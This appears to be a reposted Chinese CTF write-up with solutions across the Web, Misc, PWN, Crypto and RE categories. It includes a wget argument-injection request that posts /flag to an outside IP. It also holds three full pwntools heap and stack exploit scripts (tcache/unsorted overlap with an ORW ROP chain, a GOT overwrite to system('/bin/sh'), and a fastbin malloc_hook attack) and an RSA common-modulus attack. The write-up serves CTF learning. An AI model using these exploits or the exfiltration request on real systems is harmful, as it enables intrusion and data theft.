Web
CheckIN
源代碼的這兩處:
先嘗試訪問/wget:/wget?argv=a,看出來這里應該是可以進行攻擊的了
接著嘗試利用wget的--post-file進行資料外帶,讀取源代碼
在自己VPS開個監聽并且構造:
/wget?argv=a&argv=--post-file&argv=/flag&argv=http://1.14.92.24:8008/
拿到flag:
flag{6e6f4abf-f38c-4d30-8ccd-e0bc0012a13f}
Misc
打敗病毒
下載附件,發現是MC,根據描述來看應該是殺掉BOSS之后就能獲得flag
進入游戲,首先肯定是要給自己來稱手一把好劍啦,直接輸入指令/give @p minecraft:diamond_sword 1 0 {ench:[{id:16,lvl:32727}]},想獲得附魔的鉆石劍,但是提示權限不過,應該是這個mod禁用了作弊,
但是這難不倒咱們老MC玩家了,直接選擇對局域網開放,并且勾選上允許作弊,游戲模式選擇創造模式,然后就能輸入剛才的指令獲得鉆石劍了
這里是有一個穿越的門的,跳進去就會到另外一個時空,里面是有boss的,但是進去了之后我們在一個平臺上,到達不了龍的位置,所以要進入創造模式,輸入/gamemode 1,現在雙擊空格就能飛起來了
對著這條龍就是一刀斬!打死了之后有個墓碑,看起來也是一個傳送門
進去之后,就提醒通關了,然后給了一串base編碼
通過base62解碼得到flag
flag為:
SETCTF{Fi9ht1ng_3ItH_V1rUs}
soEasyCheckin
下載附件得到一串base編碼,但是直接解開會亂碼,仔細觀察發現其中夾雜著一個$符號
于是嘗試去解前半部分的base,發現是base32
e5b9b3e7ad89e5928ce8b090e887aae794b1e5b9b3e7ad89e5b9b3e7ad89e887aae794b1e6b395e6b2bbe58f8be59684e5b9b3e7ad89e5b9b3e7ad89e6b091e4b8bbe585ace6ada3e695ace4b89ae5928ce8b090e69687e6988ee5b9b3e7ad89e788b1e59bbde585ace6ada3e695ace4b89ae585ace6ada3e8af9ae4bfa1e887aae794b1e5928ce8b090e6b091e4b8bbe5b9b3e7ad89e788b1e59bbde585ace6ada3e695ace4b89ae585ace6ada3e5b9b3e7ad89e5928ce8b090e69687e6988ee887aae794b1e58f8be59684e585ace6ada3e585ace6ada3e695ace4b89ae5928ce8b090e887aae794b1e69687e6988ee58f8be59684e6b395e6b2bbe887aae794b1e58f8be59684e585ace6ada3e585ace6ada3e58f8be59684e695ace4b89ae585ace6ada3e8af9ae4bfa1e887aae794b1e585ace6ada3e6b395e6b2bbe5928ce8b090e5928ce8b090e5b9b3e7ad89e695ace4b89ae6b395e6b2bbe5b9b3e7ad89e585ace6ada3e6b091e4b8bbe585ace6ada3e8af9ae4bfa1e887aae794b1e5928ce8b090e69688
hex解碼得到:
平等和諧自由平等平等自由法治友善平等平等民主公正敬業和諧文明平等愛國公正敬業公正誠信自由和諧民主平等愛國公正敬業公正平等和諧文明自由友善公正公正敬業和諧自由文明友善法治自由友善公正公正友善敬業公正誠信自由公正法治和諧和諧平等敬業法治平等公正民主公正誠信自由和諧
核心價值觀解碼報錯了,最后發現把最后的和諧兩個字去除就行了
解碼得到前半部分得flag:
SET{Qi2Xin1Xie2Li4-Long3Yuan
后半部分同樣是base32,按道理來說可以直接解開,但是這里亂碼了,原因是長度不夠,于是在前面添上777
可以得到:
6988ee5b9b3e7ad89e58f8be59684e887aae794b1e585ace6ada3e788b1e59bbde585ace6ada3e6b091e4b8bbe585ace6ada3e58f8be59684e788b1e59bbde5928ce8b090e887aae794b1e5b9b3e7ad89e695ace4b89ae585ace6ada3e695ace4b89ae5928ce8b090e887aae794b1e6b395e6b2bbe8af9ae4bfa1e5928ce8b090
這里hex解碼又是亂碼,把第一個6刪掉,再解碼得到平等友善自由公正愛國公正民主公正友善愛國和諧自由平等敬業公正敬業和諧自由法治誠信和諧
再解碼得到Zhan4Yi4},但是注意少了一個數字,因為每一個拼音后面都有一個數字,在前半段
flagSET{Qi2Xin1Xie2Li4-Long3Yuan中的Yuan后面肯定是有一個數字的,經過一個一個試,最終得到是2
所以完整flag為:
SET{Qi2Xin1Xie2Li4-Long3Yuan2Zhan4Yi4}
SOS
下載附件,又是MC,這次不是打怪了,這次一進去,就聽到了撥號的音,然后旁邊是 很多按鈕,通過踩下這些按鈕,旁邊就落下來一些東西
通過這些就可以猜想 通過DTMF的腳本來識別這段撥號音頻,得到按鍵的循序,通過這個順序依次踩下按鈕,用手機將音頻錄制下來,然后轉為wav格式的音頻
DTMF腳本地址:https://github.com/ribt/dtmf-decoder
DTMF腳本:
#!/usr/bin/env python3
import numpy as np
import matplotlib.pyplot as plt
from scipy.io import wavfile
import argparse
dtmf = {(697, 1209): "1", (697, 1336): "2", (697, 1477): "3", (770, 1209): "4", (770, 1336): "5", (770, 1477): "6",
(852, 1209): "7", (852, 1336): "8", (852, 1477): "9", (941, 1209): "*", (941, 1336): "0", (941, 1477): "#",
(697, 1633): "A", (770, 1633): "B", (852, 1633): "C", (941, 1633): "D"}
parser = argparse.ArgumentParser(description="Extract phone numbers from an audio recording of the dial tones.")
parser.add_argument("-v", "--verbose", help="show a complete timeline", action="store_true")
parser.add_argument("-l", "--left", help="left channel only (if the sound is stereo)", action="store_true")
parser.add_argument("-r", "--right", help="right channel only (if the sound is stereo)", action="store_true")
parser.add_argument("-d", "--debug", help="show graphs to debug", action="store_true")
parser.add_argument("-t", type=int, metavar="F", help="acceptable frequency error (in hertz, 20 by default)",
default=20)
parser.add_argument("-i", type=float, metavar='T', help="process by T seconds intervals (0.04 by default)",
default=0.04)
parser.add_argument('file', type=argparse.FileType('r'))
args = parser.parse_args()
file = args.file.name
try:
fps, data = wavfile.read(file)
except FileNotFoundError:
print("No such file:", file)
exit()
except ValueError:
print("Impossible to read:", file)
print("Please give a wav file.")
exit()
if args.left and not args.right:
if len(data.shape) == 2 and data.shape[1] == 2:
data = np.array([i[0] for i in data])
elif len(data.shape) == 1:
print("Warning: The sound is mono so the -l option was ignored.")
else:
print("Warning: The sound is not mono and not stereo (" + str(
data.shape[1]) + " canals)... so the -l option was ignored.")
elif args.right and not args.left:
if len(data.shape) == 2 and data.shape[1] == 2:
data = np.array([i[1] for i in data])
elif len(data.shape) == 1:
print("Warning: the sound is mono so the -r option was ignored.")
else:
print("Warning: The sound is not mono and not stereo (" + str(
data.shape[1]) + " canals)... so the -r option was ignored.")
else:
if len(data.shape) == 2:
data = data.sum(axis=1) # stereo
precision = args.i
duration = len(data) / fps
step = int(len(data) // (duration // precision))
debug = args.debug
verbose = args.verbose
c = ""
if debug:
print(
"Warning:\nThe debug mode is very uncomfortable: you need to close each window to continue.\nFeel free to kill the process doing CTRL+C and then close the window.\n")
if verbose:
print("0:00 ", end='', flush=True)
try:
for i in range(0, len(data) - step, step):
signal = data[i:i + step]
if debug:
plt.subplot(311)
plt.subplots_adjust(hspace=0.5)
plt.title("audio (entire signal)")
plt.plot(data)
plt.xticks([])
plt.yticks([])
plt.axvline(x=i, linewidth=1, color='red')
plt.axvline(x=i + step, linewidth=1, color='red')
plt.subplot(312)
plt.title("analysed frame")
plt.plot(signal)
plt.xticks([])
plt.yticks([])
frequencies = np.fft.fftfreq(signal.size, d=1 / fps)
amplitudes = np.fft.fft(signal)
# Low
i_min = np.where(frequencies > 0)[0][0]
i_max = np.where(frequencies > 1050)[0][0]
freq = frequencies[i_min:i_max]
amp = abs(amplitudes.real[i_min:i_max])
lf = freq[np.where(amp == max(amp))[0][0]]
delta = args.t
best = 0
for f in [697, 770, 852, 941]:
if abs(lf - f) < delta:
delta = abs(lf - f)
best = f
if debug:
plt.subplot(313)
plt.title("Fourier transform")
plt.plot(freq, amp)
plt.yticks([])
plt.annotate(str(int(lf)) + "Hz", xy=(lf, max(amp)))
lf = best
# High
i_min = np.where(frequencies > 1100)[0][0]
i_max = np.where(frequencies > 2000)[0][0]
freq = frequencies[i_min:i_max]
amp = abs(amplitudes.real[i_min:i_max])
hf = freq[np.where(amp == max(amp))[0][0]]
delta = args.t
best = 0
for f in [1209, 1336, 1477, 1633]:
if abs(hf - f) < delta:
delta = abs(hf - f)
best = f
if debug:
plt.plot(freq, amp)
plt.annotate(str(int(hf)) + "Hz", xy=(hf, max(amp)))
hf = best
if debug:
if lf == 0 or hf == 0:
txt = "Unknown dial tone"
else:
txt = str(lf) + "Hz + " + str(hf) + "Hz -> " + dtmf[(lf, hf)]
plt.xlabel(txt)
t = int(i // step * precision)
if verbose and t > int((i - 1) // step * precision):
m = str(int(t // 60))
s = str(t % 60)
s = "0" * (2 - len(s)) + s
print("\n" + m + ":" + s + " ", end='', flush=True)
if lf == 0 or hf == 0:
if verbose:
print(".", end='', flush=True)
c = ""
elif dtmf[(lf, hf)] != c or verbose:
c = dtmf[(lf, hf)]
print(c, end='', flush=True)
if debug:
plt.show()
print()
except KeyboardInterrupt:
print("\nCTRL+C detected: exiting...")
使用終端命令:
python dtmf.py 1.wav
得到踩鍵的順序后,依次踩下,即可得到flag
flag為:
SETCTF{C0M3_4nD_he1P_mE}
PWN
h3apclass:
首先分析題目,經典選單題,不過沒有show libc2.31
漏洞點在edit中,因為使用的是strlen,因此造成溢位,
leak_libc 部分: 通過溢位更改chunk的size為0x430直接進入unsorted bin
然后再不斷申請切割該unsorted bin 以達到unsorted bin 與 tcache重疊的效果,最后爆破一位 1/16 出stdout leak出libc
get_flag 部分 :一開始用setcontext寫的,但一直沒有成,
后面想用environ泄露出堆疊地址,但因為沒有show失敗,
后來想到這個是題黑名單,只是禁用了execve,于是改free_hook為printf地址,然后給printf傳入%15$p 泄露出堆疊上的地址,得到add函式的回傳地址,
最后直接把orw鏈打入add的ret地址處,列印出flag,
exp :
from pwn import*
context.log_level = "debug"
io = process("./H3apClass")
#io = remote("node4.buuoj.cn","28143")
libc = ELF("./libc.so.6",checksec = 0)
def fuck(choice):
io.sendlineafter("4:Drop homework\n",str(choice))
def add(index,size,content):
fuck(1)
io.sendlineafter("Which homework?\n",str(index))
io.sendlineafter("size:\n",str(size))
io.sendlineafter("content:\n",content)
def Add(index,size,content):
fuck(1)
io.sendlineafter("Which homework?\n",str(index))
io.sendlineafter("size:\n",str(size))
io.sendafter("content:\n",content)
def edit(index,content):
fuck(3)
io.sendlineafter("Which homework?\n",str(index))
io.sendafter("content:\n",content)
def delete(index):
fuck(4)
io.sendlineafter("Which homework?\n",str(index))
def look():
global io
gdb.attach(io)
"""
def pwn():
#gdb.attach(io)
add(0,0x18,b"0"*0x18)
add(1,0xf8,b"1"*0xf8)
add(2,0xf8,b"2"*0xf8)
add(3,0xf8,b"3"*0xf8)
add(4,0xf8,b"4"*0xf8)
add(5,0x28,b"a"*0x28)
add(6,0xf8,b"5"*0xf8)
edit(5,b"a"*0x20 + p64(0x430) + p64(0x100))
edit(0,b"a"*0x10 + p64(0) + p64(0x430))
delete(6)
look()
pwn()
"""
def pwn():
#gdb.attach(io)
add(0,0x18,b"a"*0x18)
add(1,0xf8,b"wangwang1")
add(2,0xf8,b"wangwang2")
add(3,0xf8,b"wangwang2")
add(4,0xf8,b"wangwang2")
add(5,0x28,"fuck_libc")
delete(4)
add(4,0x18,"eeeenb")
add(6,0x28,p64(0)+p64(0x21))
edit(0,b"a"*0x10+p64(0)+b"\x51\x04")
delete(0)
delete(1)
for i in range(2,5):
delete(i)
for i in range(2,5):
add(i,0xe8,"a")
for i in range(2,5):
delete(i)
delete(6)
delete(5)
add(2,0xd8,"2")
add(3,0x48,b"3")
Add(4,0x38,b"\xa0\x36")
delete(2)
delete(3)
#pause()
add(2,0x28,"0")
paylaod = p64(0xfbad1887)+p64(0)*3+b"\x58"
add(3,0x28,paylaod)
libc_base = u64(io.recvuntil("\x7f",timeout=0.1)[-6:].ljust(8,b'\x00'))-0x1ed4a0 # _IO_2_1_stderr_+216 store _IO_file_jumps
if libc_base == -0x1ed4a0:
exit(-1)
libc_base = libc_base - 0x7fcee3001afc + 0x7fcee3037000
success("libc_base:"+hex(libc_base))
free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]
printf = libc_base + libc.sym["printf"]
environ = libc_base + libc.sym["environ"]
setcontext = libc_base + libc.sym["setcontext"]
read = libc_base + libc.sym["read"]
write = libc_base + libc.sym["write"]
open = libc_base + libc.sym["open"]
pop_rdi_ret = libc_base + 0x26b72
pop_rdx_r12 = libc_base + 0x11c371
pop_rsi_ret = libc_base +0x27529
pop_rax_ret = libc_base + 0x4a550
syscall_ret = read + 0xf
ret = libc_base + 0x25679
success("free_hook:"+hex(free_hook))
#look()
delete(4)
add(4,0x40,b"a"*0x40)
edit(4,p64(0)*5+p64(0x21)+p64(free_hook))
add(0,0x18,b"%15$p")
add(6,0x18,p64(printf)+b"flag"+b"\x00"*4)
delete(0)
info = int(io.recv(14),16)
success("stack_addr:"+hex(info)) #the_main_ret
add_ret = info - 0x7ffd26ceb5e8 + 0x7ffd26ceb4d8
success("add_ret:"+hex(add_ret))
add(0,0xe0,p64(0)*4 + p64(add_ret))
delete(0)
delete(4)
add(0,0xf8,b"0")
flag_addr = free_hook + 0x8
orw = p64(pop_rdi_ret) + p64(flag_addr)
orw += p64(pop_rsi_ret) + p64(0) #The open arg2 = 0 -> only read
#orw += p64(pop_rax_ret) + p64(2)
#orw += p64(syscall_ret)
orw += p64(open)
orw += p64(pop_rdi_ret) + p64(3)
orw += p64(pop_rsi_ret) + p64(flag_addr+0x8)
orw += p64(pop_rdx_r12) + p64(0x40) + p64(0)
orw += p64(read)
orw += p64(pop_rdi_ret) + p64(1);
orw += p64(write)
add(4,0xf8,orw)
io.recvuntil("flag")
sleep(100)
io.interactive()
while True:
try :
#io = process("./H3apClass")
io = remote("node4.buuoj.cn","29896")
pwn()
except:
io.close
continue
bbbaby:
首先分析題目,有兩個功能,
一個是可以對輸入的地址指向進行edit,
另外一個是可以對v5進行任意size的輸入,
于是很容易知道是需要通過v5溢位進行堆疊溢位攻擊,但checksec后發現開了canary,又因為got表可改并且無PIE,所以可以把**_stack_chk_fail**的got表改為main,于是溢位V5列印puts地址后再次回到了main函式,然后再次改got表,通過改atoi_got為system,并傳入/bin/sh\引數,getshell
exp :
from pwn import*
context.log_level = "debug"
io = remote("node4.buuoj.cn","27853")
elf = ELF('./pwn1',checksec = 0)
libc = ELF('./libc-2.23.so',checksec = 0)
pop_rdi_ret = 0x400a03
main_addr = 0x40090B
canary_check = 0x601020
atoi_got = 0x601040
offset = 0x110 + 0x8
def chocie(c):
io.recvuntil("choice")
io.sendline(str(c))
def pwn(size,content):
chocie(1)
io.recvuntil(":")
io.sendline(str(size))
io.recvuntil(":")
io.send(content)
def edit_addr(addr,content):
chocie(0)
io.recvuntil(":")
io.sendline(addr)
io.recvuntil(":")
io.send(content)
payload = p64(pop_rdi_ret) + p64(elf.got["puts"])
payload += p64(elf.plt['puts']) + p64(main_addr)
edit_addr(str(canary_check),p64(main_addr))
pwn(0x150,b"a"*offset + payload)
chocie(5)
chocie(5)
#leak_libc and get shell
puts = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base =puts - libc.sym['puts']
system = libc_base + libc.sym['system']
edit_addr(str(atoi_got),p64(system))
io.sendline(b'/bin/sh\x00')
io.interactive()
Magic:
剛拿到這個題比較懵逼,一堆大數,簡直是嚇壞孩子了,
然后直接上gdb分析就是個模板題
有 UAF,直接 fastbin attack可以打過去,
leak_libc 部分 : 填充8個a printf 順帶 main_arena+88c出來
get_shell 部分 : 直接fastbin_attack 打malloc_hook
exp :
from pwn import *
context.log_level = "debug"
io = remote("node4.buuoj.cn",27312)
elf = ELF("./Magic",checksec = 0)
libc = ELF('libc-2.23.so',checksec = 0)
one = [0x45226,0x4527a,0xf03a4,0xf1247]
main_arena = 0x3c4b20
def fuck(index):
io.recvuntil("Input your choice: ")
io.sendline(str(index))
io.sendline('0')
def add(index):
fuck(1)
io.sendline(str(index))
io.sendline('0')
def edit(index,content):
fuck(2)
io.recvuntil("Input the idx")
io.sendline(str(index))
io.sendline('0')
io.recvuntil("Input the Magic")
io.send(content)
def delete(index):
fuck(3)
io.recvuntil("Input the idx")
io.sendline(str(index))
io.sendline('0')
#leak_libc
add(0)
add(1)
edit(0,b"a"*8)
libc_base = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00')) - 0x3c4d98
realloc = libc_base + libc.sym['realloc']
malloc_hook = libc_base + libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
success("malloc_hook"+hex(malloc_hook))
one_gadget = one[3] + libc_base
#fuck the malloc_hook and libc_realloc
delete(1)
delete(0)
edit(0,p64(malloc_hook - 0x23))
add(0)
add(1)
payload = b'\x00'*11+p64(one_gadget)+p64(realloc+0x10)
edit(1,payload)
delete(0)
delete(0)
io.interactive()
Crypto
mostlycommon
seebug上有ctf 密碼學常見演算法總結 (seebug.org)
# -*- coding:utf-8 -*-
from gmpy2 import invert
def gongmogongji(n, c1, c2, e1, e2):
def egcd(a, b):
if b == 0:
return a, 0
else:
x, y = egcd(b, a % b)
return y, x - (a // b) * y
s = egcd(e1, e2)
s1 = s[0]
s2 = s[1]
# 求模反元素
if s1 < 0:
s1 = - s1
c1 = invert(c1, n)
elif s2 < 0:
s2 = - s2
c2 = invert(c2, n)
m = pow(c1, s1, n) * pow(c2, s2, n) % n
return m
n= 103109065902334620226101162008793963504256027939117020091876799039690801944735604259018655534860183205031069083254290258577291605287053538752280231959857465853228851714786887294961873006234153079187216285516823832102424110934062954272346111907571393964363630079343598511602013316604641904852018969178919051627
e1= 13
e2= 15
c1= 13981765388145083997703333682243956434148306954774120760845671024723583618341148528952063316653588928138430524040717841543528568326674293677228449651281422762216853098529425814740156575513620513245005576508982103360592761380293006244528169193632346512170599896471850340765607466109228426538780591853882736654
c2= 79459949016924442856959059325390894723232586275925931898929445938338123216278271333902062872565058205136627757713051954083968874644581902371182266588247653857616029881453100387797111559677392017415298580136496204898016797180386402171968931958365160589774450964944023720256848731202333789801071962338635072065
result = gongmogongji(n, c1, c2, e1, e2)
print result
m1=hex(50937517501984079318479184180525081694999782691988219077509947184814275476037417455150384)
print m1
import binascii
m2=binascii.unhexlify(b'666c61672d3534643364623563316566636437616661353739633337626362353630616530')
print m2
共模攻擊的,把上面的exp稍微改下就行
# -*- coding:utf-8 -*-
from gmpy2 import invert
import gmpy2
from Crypto.Util.number import *
def gongmogongji(n,c1,c2,e1,e2):
def egcd(a, b):
if a==0:
return (b, 0, 1)
else:
z,y,x=egcd(b%a,a)
return (z,x-(b//a)*y,y)
s=egcd(e1, e2)
s1=s[1]
s2=s[2]
# 求模反元素
if s1<0:
s1=-s1
c1=invert(c1,n)
else:
s2=-s2
c2=invert(c2,n)
m=pow(c1,s1,n)*pow(c2,s2,n)%n
m=gmpy2.iroot(m,2)[0]
print(long_to_bytes(m))
n=122031686138696619599914690767764286094562842112088225311503826014006886039069083192974599712685027825111684852235230039182216245029714786480541087105081895339251403738703369399551593882931896392500832061070414483233029067117410952499655482160104027730462740497347212752269589526267504100262707367020244613503
e1=65536
e2=270270
c1=39449016403735405892343507200740098477581039605979603484774347714381635211925585924812727991400278031892391996192354880233130336052873275920425836986816735715003772614138146640312241166362203750473990403841789871473337067450727600486330723461100602952736232306602481565348834811292749547240619400084712149673
c2=43941404835820273964142098782061043522125350280729366116311943171108689108114444447295511969090107129530187119024651382804933594308335681000311125969011096172605146903018110328309963467134604392943061014968838406604211996322468276744714063735786505249416708394394169324315945145477883438003569372460172268277
gongmogongji(n, c1, c2, e1, e2)
flag為:
SETCTF{now_you_master_common_mode_attack}
RE
EasyRe
直接shift+F12進行字串查找即可
flag為:
flag{fc5e038d38a57032085441e7fe7010b0}
findme
IDA丟入,發現只能看到檢查長度,而字串比較經過測驗不對,直接上OD
難怪IDA沒識別出來,因為eax不確定,下個斷點,我取到了call eax呼叫的函式,進IDA繼續分析
em,RC4加密,穩了
記憶體dump出加密資料,直接解密
flag為:
SETCTF{Th1s_i5_E2_5tRcm9!}
power
記事本打開瞅一波
有很多含有aes的字串,繼續往下
發現個this_is_a_key!!!
這下aes應該跑不脫了,直接網站解密即可
flag為:
flag{y0u_found_the_aes_12113112}
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/353280.html
標籤:其他